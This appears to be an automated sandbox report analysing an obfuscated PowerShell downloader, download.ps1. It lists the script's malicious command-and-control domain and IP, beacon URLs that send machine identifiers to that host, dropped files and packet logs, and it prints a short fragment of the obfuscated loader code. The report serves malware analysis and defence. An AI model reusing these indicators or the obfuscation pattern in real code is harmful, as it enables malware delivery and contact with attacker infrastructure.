                                          http://www.google.compowershell.exe, 00000000.00000002.2141075548.00000225AE00F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://apis.google.compowershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.micro6powershell.exe, 00000000.00000002.2183490540.00000225C4898000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2141075548.00000225AC6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://contoso.com/Iconpowershell.exe, 00000000.00000002.2172963957.00000225BC74D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://0.googlepowershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://cmacnnkfbhlcncm.toppowershell.exe, 00000000.00000002.2141075548.00000225AE00F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225ADC18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.google.cpowershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://0.google.powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifXpowershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://crl.micropowershell.exe, 00000000.00000002.2183490540.00000225C4898000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://0.google.com/powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2141075548.00000225AC908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.2141075548.00000225AC6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.2141075548.00000225AE24E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              45.61.136.138
                                                                                                              		cmacnnkfbhlcncm.topUnited States
                                                                                                              		40676AS40676USfalse
                                                                                                              142.250.181.132
                                                                                                              		www.google.comUnited States
                                                                                                              		15169GOOGLEUSfalse

                                                                                                              General Information

                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1578248
                                                                                                              Start date and time:2024-12-19 13:28:06 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 4m 27s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:6
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:download.ps1
                                                                                                              Detection:MAL
                                                                                                              Classification:mal64.evad.winPS1@2/7@2/2
                                                                                                              EGA Information:Failed
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 15
                                                                                                              • Number of non-executed functions: 1
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .ps1

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 4164 because it is empty
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              07:28:57API Interceptor46x Sleep call for process: powershell.exe modified

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/57fd316pguhtr.php?id=computer&key=75439930857&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/rz932vog4whtr.php?id=user-PC&key=63562548914&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/h5raxn90w1htr.php?id=user-PC&key=130484823816&s=527

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              cmacnnkfbhlcncm.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 23.179.110.68
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              7hCWDvuinz.jsGet hashmaliciousUnknownBrowse
                                                                                                              • 45.61.137.71
                                                                                                              Fattura72543461.jsGet hashmaliciousUnknownBrowse
                                                                                                              • 45.61.137.71
                                                                                                              Fattura72543461.jsGet hashmaliciousUnknownBrowse
                                                                                                              • 45.61.137.71

                                                                                                              JA3 Fingerprints

                                                                                                              No context

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):64
                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:NlllulNg7/l/lZ:NllUy7/
                                                                                                              MD5:C2537D289A7DB67172EF4C08F96CB120
                                                                                                              SHA1:95114E0682CC761B86321F0DCC5CBE9A3E89DB21
                                                                                                              SHA-256:26D1A27AED70765338B4BCFEDC7C23289CFDA9A984B1A55799FB89CFAE10C3C9
                                                                                                              SHA-512:B991F49ECB907FA7CFCF6121BA004C1C5156A86F508E22B76FD1E53B21B7D6C4831EFF8EBCFB2CC9CB97E44DD578B276B734CB1D3CE96355E51C4578FB227603
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:@...e................................................@..........

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoaiojqe.ze2.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqpvwrn5.ibt.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_limioekv.3m2.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkzdp40e.yb5.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6222
                                                                                                              Entropy (8bit):3.7090543206160054
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:tvNWJ+CebU2K+QGzukvhkvklCywan2vYarXbUYialzU7SogZopPYarXbUYialWUt:Bi+Cbo1ykvhkvCCt6YLZ++HxYLZb+HW
                                                                                                              MD5:B9143ABF1B66553BCFAF67633029889A
                                                                                                              SHA1:D264E7807720E478901E3411BD074B100F51E3A8
                                                                                                              SHA-256:B58DE2713959348F14F034EF83F92502BFD19BF119B6493F8F4C6AAA1C87CEC6
                                                                                                              SHA-512:CE8A870C74705B7B9CBEA3FD0A2FD4E32DF1C300B499D09E4ED3BA16CE345C52AE30B820E5280D9812F0CF6E3D9B7BBB04756F3EF0F79E840161F7435512EAED
                                                                                                              Malicious:false
                                                                                                              Preview:...................................FL..................F.".. ...d......."+..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......d?..R...I2..R......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.c....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.c..Roaming.@......DWSl.Y.c....C......................A.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y.c....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y.c....E.....................@%..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y.c....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y.c....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.c....q...........

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HUYQTLHNLPVW72IF8WRA.temp

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6222
                                                                                                              Entropy (8bit):3.7090543206160054
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:tvNWJ+CebU2K+QGzukvhkvklCywan2vYarXbUYialzU7SogZopPYarXbUYialWUt:Bi+Cbo1ykvhkvCCt6YLZ++HxYLZb+HW
                                                                                                              MD5:B9143ABF1B66553BCFAF67633029889A
                                                                                                              SHA1:D264E7807720E478901E3411BD074B100F51E3A8
                                                                                                              SHA-256:B58DE2713959348F14F034EF83F92502BFD19BF119B6493F8F4C6AAA1C87CEC6
                                                                                                              SHA-512:CE8A870C74705B7B9CBEA3FD0A2FD4E32DF1C300B499D09E4ED3BA16CE345C52AE30B820E5280D9812F0CF6E3D9B7BBB04756F3EF0F79E840161F7435512EAED
                                                                                                              Malicious:false
                                                                                                              Preview:...................................FL..................F.".. ...d......."+..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......d?..R...I2..R......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.c....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.c..Roaming.@......DWSl.Y.c....C......................A.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y.c....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y.c....E.....................@%..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y.c....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y.c....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.c....q...........

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:ASCII text, with very long lines (10876), with CRLF line terminators
                                                                                                              Entropy (8bit):6.0111175419643885
                                                                                                              TrID:
                                                                                                                File name:download.ps1
                                                                                                                File size:19'439 bytes
                                                                                                                MD5:f91e3c78bfc0cc41330d65764455a851
                                                                                                                SHA1:294c15d09a7df4d91e891d7ca3bc2803c8262ce1
                                                                                                                SHA256:3cef01524b94194e6e6834746b8215ebdd4b51c29e92187d6e59e8be1b365934
                                                                                                                SHA512:1899a3848c18343b39e0a3cb5887b777e270a032f7447e9554c94a4a757cb05623e3b17c5da1bd3fb43ee2f16a0da64a71e12c99fc81efc86e533c0927b0e700
                                                                                                                SSDEEP:384:fD6lYFayIXH9VxzwZ3XPOsGhJ06ZLpAg1cHsf4ftu1vrNpjuFLP2TdQiGo/N:fOlYUyqps3XWfuIVAru1vrNZuURQiGo1
                                                                                                                TLSH:F5927EC837C8E8E1C6CD967ED90A7C087762383AD4D56FC0F398D5C563AA294ABD8C40
                                                                                                                File Content Preview:$cvdkoxwrnfj=$executioncontext;$inenatreerbealentionerinaten = ([ChAR[]]@((640-(5571804/(52357872/(12327-(54379024/7984))))),(-9718+(93713840/(61561456/6418))),(553812/(18051-(55511100/(61505100/(263+(14980-6008)))))),(9327-9277),(9128/(9681-(72079814/(36

                                                                                                                File Icon

                                                                                                                Icon Hash:3270d6baae77db44

                                                                                                                Network Behavior

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 19, 2024 13:29:00.601763010 CET4970480192.168.2.545.61.136.138
                                                                                                                Dec 19, 2024 13:29:00.721503973 CET804970445.61.136.138192.168.2.5
                                                                                                                Dec 19, 2024 13:29:00.721606016 CET4970480192.168.2.545.61.136.138
                                                                                                                Dec 19, 2024 13:29:00.724692106 CET4970480192.168.2.545.61.136.138
                                                                                                                Dec 19, 2024 13:29:00.844464064 CET804970445.61.136.138192.168.2.5
                                                                                                                Dec 19, 2024 13:29:01.997759104 CET804970445.61.136.138192.168.2.5
                                                                                                                Dec 19, 2024 13:29:02.051506042 CET4970480192.168.2.545.61.136.138
                                                                                                                Dec 19, 2024 13:29:02.164750099 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:02.285135984 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:02.285218000 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:02.285887003 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:02.405597925 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.146959066 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.147021055 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.147058964 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.147085905 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.147152901 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.147186995 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.147201061 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.147222996 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.147278070 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.147279024 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.147375107 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.147425890 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.147444010 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.147480011 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.147537947 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.266819000 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.266860008 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.266942024 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.339266062 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.339344025 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.339406967 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.343394041 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.344320059 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.344374895 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.344403982 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.352581978 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.352664948 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.356931925 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.357076883 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.357141018 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.362132072 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.371514082 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.371575117 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.371666908 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.375783920 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.375849962 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.385339022 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.385502100 CET8049705142.250.181.132192.168.2.5
                                                                                                                Dec 19, 2024 13:29:04.385561943 CET4970580192.168.2.5142.250.181.132
                                                                                                                Dec 19, 2024 13:29:04.389489889 CET8049705142.250.181.132192.168.2.5
